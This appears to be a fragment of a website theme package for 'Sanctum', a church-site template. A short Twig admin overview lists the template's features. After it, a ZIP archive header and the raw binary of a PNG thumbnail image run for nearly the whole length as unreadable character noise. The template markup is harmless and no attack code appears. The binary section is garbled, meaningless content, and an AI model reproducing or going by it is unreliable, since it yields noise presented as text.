             <img src="{{ url(info.thumbnail) }}" class="preview-image" alt="">
        </div>

        <div class="g-block">
            <p>Sanctum is a modern, minimalistic template designed specifically for Church websites. It comes with a wide variety of custom particles that makes it one of the easiest templates to work with. Sanctum comes with naturally integrated UIkit framework which makes it one of the most powerful templates on the web!</p>
            <ul class="overview-list">
                <li><i class="fa fa-asterisk"></i>Clean, minimalistic design</li>
                <li><i class="fa fa-asterisk"></i>Fast and lightweight</li>
                <li><i class="fa fa-asterisk"></i>Includes preset styles and outlines</li>
                <li><i class="fa fa-asterisk"></i>UIkit Framework naturally integrated</li>
                <li><i class="fa fa-asterisk"></i>ScrollReveal.js for OnScroll Animations</li>
                <li><i class="fa fa-asterisk"></i>And much, much more...</li>
            </ul>
        </div>
    </div>

    {% include '@gantry-admin/partials/gantry-details.html.twig' %}
{% endblock %}
PK!��2�r�r!it_sanctum/template_thumbnail.pngnu&1i��PNG


IHDR��� 	tEXtSoftwareAdobe ImageReadyq�e<"iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:7C883623858C11E6AD4F995F9E82C510" xmpMM:DocumentID="xmp.did:7C883624858C11E6AD4F995F9E82C510"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:7C883621858C11E6AD4F995F9E82C510" stRef:documentID="xmp.did:7C883622858C11E6AD4F995F9E82C510"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>�+��o%IDATx��w�eIy'x2����}���
M�
m-@4BBH��jWH3#E(fW����jc����̆������	!@@7�
����U]��˛���g�e�9��WU�Ղ�=4��w�1�_���g�!���s"�W����~C����c���O��O��˪[ӓc���*%<I�>��X0�!"N`.	%��C���?��_����Ϯn����������~�[_Y^Z^�S��*Y\\\l�z�
���.?`��A7f�[?�����ww�c.�4�
j�k�m��A���,��(a����0_��(4"9u��k^�0��'�Յ�|�����LOV�49��n�k�={K��E��}fl~�����p�#i�n?�pc�
o��_�W����G�aA`��Y��~#�&Ay[3
BY둣��%b�o��I�2��j�����<x��V���?p��ٞ���<�
đ���|cjr4��X�i�����ï���?���	5��^��e̚m�����sW�W1���#"�*WKS����R�ш�}7+O���}Cj��ax��
k�`��Jlĩ����$�qjx��y�o�����W_/�)ɸ���GQ�n�	���
Jvک/(6�*7��&�4?s�/��}���T��c�J��d���	#�v*�ݥD��˫H��ⅾ]����Bi�&퉯{Z�HF�?Lj?�����������1��1��1������}��i�?�o�a��ঢ������T�������?����$u���D��y�j�V���F{�{�ϼw�������3Ĵ	鄑�}k�Hb�����g�xߏ�'���a$��g��?s��ţ�c_=����Gc5�j��బ����N�����=5��������Γ�N�^����Z��?���}����o4Z]M��hqe�3����F�0����]�ۿm?�$�B8�h�F�����N�Z5M�xe���;�=;���=?��[�P�%]��_��el4\#��������S�[�~��Y溕�n��y���r���>�G13Gc8B�o���;�o~:	� L�;ok}驅��������q��?m�5�+y����7mb_xmq����l|��xiu��~i��>.\��VEN��{�)�V��H�~�OjYi�����T��#@ڜ]s`���죥R�u���%8e�o
�վ��,����7���i�윛��?���/N���&�.gv
$�҇~��1S��.�8i:��m׏�_�X�㿹��a��k����}X���F���񅿴g���4kUe��Fl$j�v���yލI!�/=��W�O,��_�2�
o�nЧ"��a!G��86���<�D��G���ϟ_����v�u���
-`�+ƾ�7�T������|�;����ףG����E�F\M�������{����q�qAp��E�$��H[\]9{�2|r�ԩ�O����ɓ�O��c/����O?��t�(|�駩m?��p5u���߁���k$j�h6�sss��K��s��j�����+��+�F��|�#��'>�l4:�k������svf�S0^���g�z��h|�c�z�|���:�/��/\�z��$	\vzzz$^#Q�^��_��_<x� HIE�+��'?�I����zꩧ��z��Moj����o���z�~�Сݻw��Ϗ���\�ݻx��Ç�����p8meee$^#Q�lj'�T���<��?�����_��_	{�',��>�я~�ʕ+����>�(���K/q�A3™h�./���v��Ν���S?�S����B�\�p��H���Ї>�O�,x��gAzx��j�LP�D<��[�Ҏ?�!H|�n�����y��^��{�m��}��� y m��d�Y��1J���<
�dkۇ׷f�jŠ���Dmt�������#Q#Q�c$j�c$j�c$j�ct�Dmt|�߱�E"J���0�0����3fVoP��4CǶ��q���K)�{������OS�8N��&���v�8�cq�Bض�&1!4�+ra�6|+I8�1Ӳn02�LxA���p�8�gS�m��o	!�A.	�����)��A��8֍j��(�����V}?p=�')c4MB�mY�B�� �Cxz����'$��4M)3=ף��S����3̳�{��^8����;|�y���L�pum��i�\��g�^8t�!���A�ϲ��ڪ���j�����ٹ�����+k�F����Jq��qZkt�Wm�5-g��l{��������ynd%�n��Q۝��j-�q�"�7�͙��Є~��˄9n�k"J
Ӣ�s۱w��ɮ[������)��(N(�n��Rcqu�R�Z���OLշ.�^�s��eXG�Z�̲�յ�j���Ga�\�����(jf�VڿۈCZ.������c�ٸA�4�%�Xs|�'�0���D��1,ߙ�)Ӳ����޼7���ciZ�VʥrЅo��`Q2�}����8H�,X�>^G�R�>���@��0���wu��0]�MLӬ�M�w���R�@9���_���WN�$,F�Zp����7�#��u+ʜ��*�|�{��z�Z��A	a�ߢd#�`t�Dmt�����������_�[����8f��v�6����Q��w�Q�*}��<~��c�[��E�S$��Tm���v.�����.��7hWg/��p�|���0��o��[����{ϮW�q��==�I������o@�17�N�xa��7
T7[C���/�W���):��xê��/R�\��K��\��9#���:D톺	��-#@�oZE�
V��`���i� J������W�����ռ��Eq�A��	�r/�J���f_�6���E��v�-6�_���)�!׉�7��E�@���A�γ��(���
)�5q#a�ɪA)V'? �w��}�$7Ѱ�M�=��M�ˡ![�Ȅ�����m�I��tv�+��ME�\�:�*�_\�T/|�9&7}u��q�Uh�Pa�5,����L�����n]��nb�3/@`�%t(������&"Ú�|�\�HL���Vl�D��8rڸ�%S�zR��j[n)��t�b�l4>ə#[ן�*gZ:�H.A^�����UA�j4Y����px$���3�-�����N�fu�mҪn*��\�$!�-�a����8�r �Gi6:���Wq�uJ`�MT�8�j���=�A�Shu��Tx�� :N��^�Qc1)rc"��{.Hh}�?�׿'�3)��y:D��b$�+�0}Q����
Hq���Z��Z>E������V��WA=P���"l�S�:9���u�{8R�3����0M
�n�[z�{ma8\����l�ٔ�7C�&
f�~6�75�)�]%@��r*��uq��m�<#�[)�s�3/(���@��3�J��N��d���ap��nipE�b��9'�?����J�Ms�غ��1�L��M��/Ջ��Բނ�B�1Tk�DM#
ɵ%\������ג[�v.=4�dSJ�լ�4T#���R���%��$�\>���3����P�E'^$���j���E��,�/JpS�5K̀����é����;�nZ\�`�Kx�$�5���$O�^.����
*�|1$#D\<0,�<�J�Oo Zf�.�*�I"�f>���t+}��>���EU"�fTT>��r
� C����`�%��,���q"AC�\���)���q�iB�6��d4j�萯8��~r�9>61
��:)6�$���
���A(�a#!�<BYBBi��/ �+IٓO���V�pL���6�io`d4��Z\����,$���Pʢŝ�
>�<��"\B��ܖ�r��8�vH}���y"Bl�:�
�G�ǭtH�
�((
��v)aE3&3�4j�.	Ѽ�Uf"�ɡ��
���JTd��0"�/�j�H˗�1犀�+S�r�(�����Y|ٗ��(ѴQQ	y�"�K5���T��(�h΍4G�y$����8�r�����OJ"�i4Gf�^�*���ib+���[n��}D��!���b��EM�̶���Tʀ=sr��O�It��W�B�к
ו��Zd�jY�ۃ)�k0E��c���C�)����n��T�ʚ��b*��Q�[���v�a91�8��u��t��^�1�(i�-R�c�#b�[�bc��qI4V�т�&řF�|C�+!>{�%D�o
W��,�Ϛ1#!/N�L��bmu
���'5��k<ǩ�_(ݓ��|X�I��Mp#�`�c��ּ��y��˝4��B��Zl����4[b����`�4#���%U0���LjL;�@��l�+�E�gy��NT���%�J+�kV�Vd�t$e��
Nȡ�O���zǕ�JC��o�h�Q�����H��C�~H�N���G��[�a�S9�4_�x� ��A)b	C��s'wFN�#����\F��J�ᷕ����Q.96��B1aC$�	�tA	�S>'�� 2YYGBY%jDҌ/�k	�>e0�\:�e�'i��I߅��U����:U��l�����hV"E����g�@5gC/@��ѹ(̐~�s/'>#ՊRh�S/J
%WWx
/H���P��T)w!��ÓJ��<�]�|A�15e"Q��Ju��.,"�=L�<DQ	�i�}�w�v	'�حP�W���&ϡBd�)2
L�8pRR!���5�X�Ȭ6<�)��7I�����VS�`�R�kv!�p�~��q��0́��:�
�DEG���$I*���:��k{LJ�fԙ7U���j��;|\�?��)R{�%��1��'y�
n�KUG�0�&���V`V���*
w.��cP6�i�u/$�発d8�������)2J5�5͜6CSDh=�ʹZNB-Y|E�G���ť�����]�|�o�H��Rz�����H�b����ʆl{r�v�o��
v�\��}a2J�'�$�,���a�WGIp<jT�\�fQ�&�J� �	���ci�"*�I�M��6nH��›�(/[:�qġ̽�L3���@;��Lp����s���-i���؀i��n�B�1>|\\��g����Y�
���O����b���	s��Q���-l5SzP4�R�
Qt�*AB��~<Ix�R�1
�I'G_��.헓02�3�F�����x����ݣP���Q�V
��(S.��q�8��Tq	b��$R�IM�r����I8�e�+�-N��v�	�|DyIm�s~���)�@1$�t���:sd
�S"�Q\�\rX4#�U<t��`�r�lqHeJ�����N��C��S�z9�<�Cyr�Hu��IfdJ�@��x�I�h��N�w�z	ǔh�\A8���J�9�e��;�3�ߵgK1��ŕ���&����~�h�
Em���-�I��*��=��Q�*�<��9T\Tr����p�*�u�� �T�˙�Pb�G��yAPu���@��n��BF�E��Z�j��L�i�^���\[�9�e+q�f�ڡ�ٍ�[d(�E���MV�<f�q_� �M%9H�;�i&[�e"Aݐ�e0)�FNay�.�Cy�����9R��.™K��{���'7��!��cu��C^��}`H�3�K-�u�Sd>8P�eg�49����%ԡ�P�M9`Ե�
����r}���r��b7�$+�u	/�$!�(��x��^�ߤ@x1D���؎$�:]	�A�x�B�Y����|�<�]:�o�>�8�V5��`�o)$�ƷJR=�"s�1�XSey�\�D
�U.�UA�fr��(�y�{-�D�HJ�`v�u>������b���z���U�L��	qBM�-9c�0��9g"�Dٕ��̲�ơސ���	�)I��Q*�<N�Ru";
�O�rF�,@1B�!U/W���
�ZِnL:"R�w@�d4[y�(+"��D)׌n }�\'��Xg�Yyq1�l� [�tr�Ha��BZ�(4���J=/4�K��o���
��ڿ�Z!Ms�����Kϰ�q}�H!�	�P@ZMSR����a$�=�.q�Z�Q��mC��tf�OM�FƲ��7�,R��M%mB���w�UFM�Ԇz���w'�u�	O"�iT��M�d��aRo��#z����0bJkAz��[P�\��x8Ϡ�8 f�	`8e���r��v.�J�~?�N�PP;���$��
�>�b�m �\��_։�:`@��������dkʗ�2��2Xa����.����h�l} mPi���@�d�vi���rm�f󞻨��bnӀێbr���(垥j���آ٩�ol����Q?���H9R�RM\��/�N�-D��A���JVdi:�!/	JOf|�ӂk7�t�ʡ�n��ei�ˌ��TI��"��ҎC�t�I�"�<L{��n�rZƛ�E�m�����C{�W.�L��D�H����aʠ���fK�3Bo����t�ؾ\`�h
�9���ْXcМ�ɵ�S�� �r�RR�hЦ���DC�$e�供m���Y�Ӷ�d�)��X
n u�ơ�i��F!"砰̰�����*�G`Y�pPb
�8N���j
�͂a�}����a2��"�q�ہ13�Z+r�
�O���8��n3�=
RR��g5<?�J[��4��$�$�] ��ȥ
W�XQ�A�m�E�P�1�KeZQ��aZ�0�B��BR)���1��!X���<BxQ�o�NKa��yAhOj�S���kަ��4�<�e�E�J��K!zW�:�e�$A�d�mj43�14����Tj5�'I�����G��C�O!}�q����^��\�Q�I�6�S�L>��Ŋ)�d2�DX���7�F�V�.;�E�s�fÕYT"��DCܬ�N
')d�긴�bK��aMePje���H[���|V#p����Z�&���TyD�4��S|q�pA�$����$�8��2!&W�_8��8��|��j�b*_A>��%�*I1�MS
Qxo h�Q!���Bx�DE1y�>�
����]�s���*B�3
�2�tVžP*
?B�X�ް$5�Pz�1�K�E$E?��6�A%� K�,�@)��:���8T�&3>`L�
�d	�4����ڒKڶ�7Ȭ'CSg��p��:�9�ւ�/&C���f��L����ۄOmiF
��)��B�
�s?
�0��V+u)��Ғ�0����8���\��B���re�l�F�$Ke��&��:��F��z��)IK�72ǭ�]#9���e��:s��p���jAh��	R�f�\�K\À+L��U��2JF.(�j�k��@�Ƹ�2�<
.Q��NB|`����%�c,��
�;%='�
t
F?��;�E���'E��vt�����֮�0.;�Qe�d���F�9yF(Ȝ���i��I�*���&mC�R��~�$2L�������
�ƿ�D���5#C�\i�Y�(OT!Zz����Ւ�'�`:
ɣRCP�9&*�ݐ�D�M�ж�Y}ᅕ�A1��i(!�	F��_�
��0�*�K(/��&j>c��B�ᯐ����i5:�8#�g̴**WG�3z���fZV/��VJPq\'�,|=�-f!�J~�~	�6(Q�r�Ĵ,�5����j����o��W�I	���c�-J&���^��Ҭ�vB9�d�<M��r�I�)G�d"s/��C�0=N��<g>�<����.V��Q�)�G��Q�9�~\K0��@�*¬��Oe� ��/!#S��pU�D��Tƨt���Y��&��Q��!��kV
z�^�+M�X���<�ccȚ��m��"cv�{e�0X�v�b$��tǘ�$�2c�6m׃�K�(Lc0�S��uv�tx�)����S���B����#��(%F���I\<�a�˟b���<�l�ū�
��}�8�b���M ��N�2f�ҩ�¡D�0�A��_%[�Q�&1�sKIV��L��A�;F*�.&�q�,,i�Ɵ
��ć%�ȹ�1�R�鄮��L���Ǐg�-Ӌ�������z-�|'���X�^�8D.(���$�1�6�!()f�f	w*�W9����y�s��{%Q˳~��*)Y��K\��[4��ZG��"x<� ��+1M�(�'�)�A����
L/.5�
1!�H��'2k	��醂�D�ӑCc��6�S�DD9u괔'a�hKk�	*u��"�BCԌAlѨJ�*g���2}\�\3a"������ @����6Q�l����"_fL��+���	*�T�_e"�LL�ee�T�}�Y��d�\0��÷�����3�918�4�J�.�����a3��U�p
;0A	�.��e�,"��d�E��*�
3�Ҭ�FwP��!��M@;Pvٍ�ƨ* )���ʁ��H�ވL��bd��s����_�,���2�+ V5�ʤ7�[7�+��6��~�T��$�9�t�3�3_�L�a���:1=�9�wD�`�����~��SY�XE�H�J���	*�c�hG��a&�5�\���!�R�i���4�"r�t�N;L�)������m
,�X�b8&�@$�24�H w&��#�HB�z
LbC�T�)� "wjX貒NW��4ɜ!�Џ���D��9t�3G4�,b��I���8�P�0.��@��Z�H��
cB�������1����)�-�Y^���U�8q�����xp?��������ijY0�+�&k��^�l[&��3/��9�e�c�}����*�
��ޣ8)�u��D����nO��2!��J��I`V�\ׅk�`�0V�n�[xm�r<�4�]�:�_����ebrt���K*=**7UH����Ia��P�R�\���X�w�
Ȁh�\�������,���s5��8�c��ړ@Ȍ�qO�/�Z��	jH�3a���� �q��pb' c�kz.�<�\�J%�M�d�6�G,�l�ql�b�ԶЉ�3�(�a+�F�\D:dXV��z
��C�����N��`��G�
��Q*�]0f�C�����{y0ۃ�ڻwϵ˗�]�
�9u�xǯ�rju�s��X��ß�$t� ��V��(�[���-���S'����/��=�̹K�	/>�̉�g�+�/��t�am�څ��\�t��UD�A��_~,���/�t��'�.�]XY��g�m��Bn?Œ�Ea���!��F�\yq�Rh2�+(���J��{u�4*%�,d:	L��Y*��a�=��0��qL���	��$B�2@i���4��#?��8�s>0D@Ih[I��ke^v
�v�7�8�ԬpwLTf�������-��z*]Q�z,�*�BŰӇ�wY��ZY�,�
���4�9*;�H��CL�K��Q�n��gP��d�N��a2ٚ���3��ϳ�M�T-Y���491q�cG�WvPL`3�ضa�T)�.o��>�̳�{�k=�
^d�,u�0�a0�^�4;ٸ��Ͻ���z��K�Ŗ�VW��#j��e73�^=q:���M�H* ���#�8��фY�LLO;���]{k.-�J����0(B[�$��	�j�d�D��nȸ��š!���<�w�T���6Zg�{ȱ�%��-.r�4>`�~?te�	��6�F-��$$��A�aN�*9p�d^*&�2��SU�2�)�Ŕ
��/5'Y�+U�Fn��:�B%�h=�Rw��]�v3PT�i��N�p�E,c��g�
��H�2&IѼ���C@��o�9��G��uw��=����0m�@1���z��jo��~��K�|�ɷ=�6��t:h�(��KW��O}�•����;���Ξ��;ݶa��<]8��w���'_��,3!�?��WMz��U2?���y���O~e��$pA�&x���=�91)�A@l��R�&��q��I��|�m\��ma�(Md��Ny�% �h�*��j1���~�@�	��D��N�VTbް���f��Ƥ�_��ʙdy
�EET��J%�'#r�_'SQta��������ԝȖ.i��;8�a�ٶ��a½0�����FW�c�x۔���
�f���J�p��o�
����m`B�$�v϶]Ɔ;m6�������rP,�Z�^��%ʥ2\�z�
�	���/yv�\�@ڼF�Ѱ-�� ��"c��&��g�'���*ܝn�9>^)�?(���Jul��[
1����϶m�T$e�e�}�l����ܵk}���fgr��͂4	�=9�)PD�"��;Q$T�,uV��b	}��#$61w-U�˪+EOx�
z��Dw]Go��)_�
7�21�/�ʼ>!S���M������"�b�|���bH��HIK-N�-����l�)�6C�ʓ����^VF�	B
���Aa+�~�27���Y�\�޵���F_��Cw��+���z7�p.�T��G�`s��^Ly�V%-�5Џ���3�%2��r)$G����Q6�EtG�r�q*s����q*H���PE@��"����

J�$�B=J��@5��y�b�<{�i�S�F�
�	K�eV�H�
��M�Y��v�Pe�(��΃[��4
��FJ(6d��{��Y��ԙ����Pm�{?�T�:t`ʲ���4`oΖ�5��9i$sPRja��f�GF�
�mE�!,!:���8Du�����2��^�&(Ɣeb�*Q��L��y��څ�HF�q<�b�#Ud�f8O����'�<�g�Q&[�N�6+e���Lv�7��jE�<5+XJ9�3��0U�/~�dj��|��T�ղЁ�>vq�u�5�2�u)���E١U�ua�~Ouǀ[(k�q�ho�

���@���d���dR
,M��l�5���鼅\\t�!M���R�m��f��
�$�R��/�u��D�����?�ʱz�k��^s�-��̈́� CK�Kfd�iy�K����b'K�7ŠjUW[I���21t#�Q

�Bc]��rّG4��H�@ޮ]^��[�\9�T�K�L����6L�H��èn\G����-��>V�6��N8-��F�TL� C�5솫��Jp��H�~M�f[�b��&i��s-{rr��f�s�{��?��^�]��l���u9�
��]�U���KY��K	D��[�dO�^tB����B��H+dYR��
Ue
�7��4���9��T�<�>` Xݱ������z��o�-��6����"FXŃ��O���HB�m��	F҄$�DY��)�e��c[rMx~���8��,\�q�0J�>��ʀ��G�f53��r��gٚo"3�+ㆺ��%�h�$'�g�z�
"�7(�!�a:`�nnd]Ao�ɶDh(U�`���b�8�UZ�Ț����m���o�c.-s���9�c�$����|ߛ^�"JT1�,����P	�I/Ob!�ܪ���U��^A���!�JWY�`�M�q�T�c�1���f�-��U��g.�~��x��{���#_�V�D����N����}��ĵX���ĵ�rm�~��-lz.�b���ô3HA��f�
0L�N�o��$�v�@@�,v�'+<6b�=��rǏE�E�i���w����q`���x��i臲�/t&�^VFVO���o�-bݴ���мA�2ٳrZ�o�\��yUH��y���[b��������C�ۤ�P�1�(�w�ȫ���վ4��pMҨ8+�~�m�4X�G�865�<tx�zK`��r����)IV�E
TI�IlȘ�0�#�)fF�HPWC�]��i�(4���sD��R��[�$�ر��7w홽��t�w��p�^�tvӵ�f7D�9�c��&W7・�	`v�Ǵ��q���g�V�ay.���D��l:1�nv:p�A��
_Y����Y��Sm�x/���m�u���k�V^��>U�.-��ko�7���o�a�e/f����w��z��&F�*�d��2a];����9j���(�2��x'�w~[�j���y4��|ʸ�p��.!C���-�:�iv�=?�7��Ԅa��2?�����{�Ke7�p�j�BdJ�j�%�0�.-��&j;L�f�"�E�πmp`���%~o+�)��I,��_X��V�K.|�3�W���c������a� ������`��a6H#����=;�>H��|Έ	�P<���F#���tH8-�ٞ]M�����xť��l�5�Lc�э�&k�Z��6I�E����u�������N'�{pW�u�$ﮙ�w��x=o2T�D�e5 �����e1��c��h���p:����NJ���Y����m4��۶
��t3��'���M�����s�>Q-g���~�S�q
�2A���������w����͎�,Pv�0�W�j�T�dNQtk��`d�%�Zܰ�ԍ���zՆm?����?����<���6H5Hao�ȼ�����E�)��JeG:GA�sY��O��$��^�?�𩄸Z�S@ܝ=J�R�,-D)�j%���F+QY��*`�d�T�JJ~�<ݛ�v�0(^_������?x�ǘ���l����nō���X���Ryrv�����>�f�+�<6�ML��vDy?�a5�@A�,�JQF�������Eu��]����&LK�`ӥ6�������WN혛���kk��	/���k��224�����kL�.y�lq��u.�B/�m帪�E0�Z?�x����D�t��8�X�Wd�޻a�%�:�Y���:B���訡��'�n�r��T���tx��U�p����$WҘe�U�*��|vY"����ѷn��5sz��X�����_�|��bk�33S�\�:1Q�Š?�s�sk+�SS���Y�#ö���N���c*ܙ�]U�ư�9�RC�8Pæ���D���2�U�U��qՅ�z�~�Bф�I���8��`9�����}�>0�d�#�؛��9�d�U�qVү���ɺ�v�3#"�o��ذ�b�L�ȾB�Ax��Uf�^�߷��D#-�ùy�y+k�י�Kg�[4��U��v�<��43�0̅��¹K$�Jt�|�:v;�K��rk��;W7��t��o��@���$"�Z����o���Z�����c"o'��'�"�a�1�_ũ�RDW�e�4��joS�3@���p<Ů`HF��OH��cP�J(���ϟxq�����F������'H"T�RH��%vօ]�[UU4��='3G����B�f�["�~%��>���VŶ5��7�NE��~l��ɪi�����v�4;� i|u�?٬��v?���l0��g�?���Z�kK�>,MV6������={wb�]�� �I�,��J(�~��X��;̜\7q�|�\�BU؇��������#ga��� �S�ы�!�j¼a���ƅ���;px/".�<X]���c�1v4d�+4>Un&mx�#I� ��J^�H�6�-)�x�>��'�E7�י��Kgs76y�����#�Cu��g�S;��9���;}q��zk�7]y�ٚ���*'aS��1���|~������F;CQuH��Ⱦr��C��
h���u���\��'�r��ӵ����3@[�eLۊ@�%I��Y�aR��V�SU T�\����t0�	���X��\��~�d��g.o����N/�z�y�3/_>^�RQ����!߽g��(�����
S�Nɫ�u�w�bj���LfHhtV	/$��@�&
�ܨ�����%+�ti��_�5�Y�����m��7�u�蜖?��$Y��yc�L��:M�N�z&��	0V9r�V�{̨����9�����S�e-�>͒��Meӷ 2�>'�K��;���竧�U"=�T-�QD8��k�������@r3ma{�#휸�Եm16_q˱���dy�W����
�ŵ����_:j0\��f}bj
&��d�Zv�������q,�-?x�;��Kg�~��O�=��|C�y�|�s�v�z��}���G���pA6.��clr�S�d(��Q3�	za�Y��B0�T��0�f��x���'�*�.�u��7>p�k_��o�^F-�~��u�,b�{c�٥
V����SݹȰI��mH���MT�Z�_�i; �GO.mdG]�)���sd�߼����$Niɖ9�4�t�S�@�J���g%�5G�ͱ���D��
�xu��*%#�F�f��lvi�$��DN{=8�8�l��o���Ң��a�Ki�҆�N sIk�����	Lb?:��XCDa��y����pa��c����3�	 �$M�2���_<k�lj�4	0�z�8���S�f����Zk
&�K{ẁn�v:��kk~�Q��(��7��<�ůn�c���Zi�����n��'ke�1�/|��Յ���ͫWWΝ9����l��_>���ٳk��j]��v�]�����B�V��r��7�M��26�4�	�����c[Ւ��'&�i �\D/�M1�Ԥ�����>�ţG�ի�;'mۚ�1�g�㺲�RI�F7�H&�	����lKV��}��^(�.+�PPd��/)���/�p�Jw~�X?�U�7�h��+i}��^c�]$k�i����۫wt��~<�t9�-w����'�{�{��|��˵w��q��s�L��7>����_������ݻ��3#�����q�Ო��<�o��k���}��&��
�K�V��n;=x���p������Q�o`����}r��j}��jk�>8x��xm`��`�m�|����G����|�]�����D��EU�����%�9w��ĵM`c����Ni~µ,�bl�k�rqmm���|����ڎN�^��m;v���Ҡ]��r��E�ٽ~/L�X���൱�sϟ
9��j�<�ę 	ff&j�2L��z���^8�����@��cD�8L�D6M��t�Z��t�<E$��	(s���G��af�8�ij�lB�
����6.]X|�ٓH']�ȡͩp��=\�x�NvF�Z
�Bπ.H�d5��t�n�����PH�.F��K�^=v���W��z�j���>�2�M���B˩pϧU�$�[f�ٵw4z����y�O���_�W{f�:8yv����ͷ}��h�n���k�Y�O��;���N�wۭG����_zx��3;�9�Qm?��k�7��Uڨ$~0�\������'�n9`:|�sO�s���a�y���O>���)^mw�~^V��O<2�?���o��1q�ď��_�_i}~�=?�,.'8�Z&<nƍ$� zq��`H	���R3��'N�^XY�v�t�|#��7-�
�xa��I��b��Ծl���Y,,�G�T��j�M#�^y��E�X��qlW��Y
�Hf=ӓ5�a+��رW~�=o�
+Au��=kU�x���3$�*Oi�1��Pzj����
w�
U`�p9��>�澙3�&3��6C�ɣ/�@8���S��iz=��{o���	(EFr��G`�RG�2�6ka��k�K��+w!��0N�x�f�
"�(�M�v���P��VU�d�W�GO=������L�mahW�N+$�uy���Jz��|�_���>ڿ�a"j}���w�^���;�ݴ�#�����<jX�Mr�L���x��ӝ���ꎝ���w�g��R�Dس��"�T�믜���C���g>�נI7���O���5�/��~�iT�u��U�QU�a����Udړfz���ɨ�Q/�0@=?^��wz�
���@�Ġ=51V&�,c|/��Y,�1[�x'�~�s��c�����f�-#6/5I��­=�q���$�[��ۃt��7g	ܽaw7Z��ģ?��+��[j�>߲僑�Rb��l���C��I\����@�0_8�6D:�m;�F:�c42�Q�)�����#_s����[_�ojnlj�17;�S�U<ϝh6A�]^�L��L\�v��a�χcD)�!XU!�Aȃ(�3C9�a��q�;i���gb8�ᖬN;�|�LO��wfp��=0c��u�z:Z�dզ�w/k�韼 +߾?<{!��iR��diap�,:�/8sΚ�5]�?uN���J�|ۡ�…���<��'������x;�SJ���9#	�3���M{�>�0��y/�.�v$��d��Μ�����?�����%��>�s_xę�S>��J�ɯ�����#@{�Ɇ�b��+Q�P�|�>1[a��ڃ�a蝒��)�0���`x`�����JH�p�}��9�\8'����ô��G�(�%�I�篷�zCO:�T�Gc�Ԥ�N���.��!� �!�=�r�a����\��41�t=f-�n���Od]
n�ǥ�
�|Ϗ�/ajL�]�d��Wm�%d��X]29�R:�)@yE/9lycp��w�@q��?|oL�r�sl ���^��ol��8��+ڰ����[�f;�ʭ��=)�=�62T%����|��==75��߿���;�g���B�F���AB�.I�p���m{f�����"�T0�-J�u�����V�A����G�D2l2A��ı�X:�A�ڹ��/�$�j����5#��&��@Ҳ��iGm�k�`/Z͚�S�8�4L{Q��de)��ݭ�IVb��%V���E�s͙?����
+o3L<�j$��AT��J��w��M�M�a��TtAņ�?r-��A8	v+7.���U�gS>�R�d7������a��J���4ȣ@@�%暖���҈~0!*#&��?�ʥ{�v������)�D��W��	35��`	��]êix�,αH�5V6�
Q-c�W�OW7 gsӕR�җ����f�_�j�|��W���#�pc�
�W[�230�u�M\r����ew��NtCH����k뽝S��6��p�0�J���ˆR�;� HH���Zi����Q�Dw���1v�1��1�k�B���$�gOH��폨�6�X���E�(�`�Eb�ڥ����ǟ�l�F9�ה�D�I6*&�c֬��E�U,�Ik#�0|Z���aY��}qs@�FX}�>->�0ʉߏ���Y��ljC
���'��ǔ&�2�q�Ut�u�a�<��jxvkz!�0����`��P8	��؆�0Xc�BF�*(�Aƒ �N||�j�m�*՚�����w��o\� doy��U��՘�2��[�p�s,���B�B�#O 9!\ȱ]9Ӷ��׽���n?#���9u�<F��{M��ec,�U�5I���bᆠd�^YX�l�\)�0"�_(���4b�sW�V���[�ɏ�u����C��?~�	�0�j���?�Ƒ��՝����(�f�R�^<_��^�4ɶ��*n�������4�o���F��kn����@Ϡq���P)��(a�`|&`�0�r��B�:8��6��KRWuI��a�Z\Q;L�v4�C�;�����:�دDZX��ѳ)P��%�H�C*	/0�JUo箹��d$:�n�Z9c���;�-�O�c��
+	�6NT�ڰ��F}��� ��Zyv���tsz��o�L�Y.W+�S�N��4Q��[o��U�*�~�B�0|����g>����M`x�cZf�-�Um1V��8g�|��O�덻��=���/�t�;�% %���Jn�Y���mͬ�ͷYs�l[0Z�k�U�$��dxrݯ$���@��8���m��ȸ��+��5��d}�BEٱ��[�m����Zs͍X�b�j�&����DRC���n‡-�I�6V�s��=3��Fϟ��Q$�/�W����,��Z�|qL,� �.All�x1�b`ՂP8.YZ_m����׼�(�oկ(/ܔV�>��k~*���6�d6�',�Q�>P0lLe�6A-�>�K�x�T�u����A���
d�b��vn4��R��,�=�@����O>�'j��ǎ����Ͽ��o���}O��
��ԥ�RъZ���U���L�_9~y���o�ϧ�~��V���@25LS��}��ޚ�(҈p'^�S&���7
`6v�x�Do٠���C��a�JC����6dv��$�{U�/�}�&r�`x�A�W�;a��^"y>�=����l�%��.י�Y)+%�
�Q`�~@:��[�͌��{�0��z����c E�A�Q���Շ[���ꀩ�TL�\�!J���ҁ9��2tJ���A���U<�b��O�A2>e÷Z����� �U�H�C?��w��A&��*��e�Vnl�ff�0"cc�|�Q�.b�6B�M�~���S�5�r7,�W�Z�1I�hQI��FȔ3�DŽ��[tvv��O~�K�vǾ��Y�[~��/X^���~W�>�����������~�S���3;�x��[���7}��Oo�;�ڬ^�+��%��&	��H�paeFó����(/m/_i߽ob�i��;��+W6��a�,�Z�$q��b�>�(9XN*3���o��FZܬ���ȕ���Ë�4�\[��߾k�������ݞ_*٠kl���L�晰Zn�U��v/1�.�|�Ī<�𱙓1�|��0ie5�S�щ������jV;��Δ]�o�)X�\�[�U���Z�g���05?fT-2HD�����|�4m`a)vPX8`��W0�]s@�k�I7�-��}�A;�m�ط��RF�}\�YR����D3�������{^ϡN�'ϐ��ba��쟛ʞ{Tm���m�`�SIl�]��'��HY�MΌ?������1UC�
	Yɥ�F�����x�ͷ�y�,�r�z�������*T�>��^&���h��;r�k�����<e����;S��zHר�6�_Z�+
{wӼ������V�+vy,ao�?vz�lmwV����Y���>��;i��8�	"��3e&������,,�1�k�j9��p�n;;G�'��{|A<a\z��W�993VD��
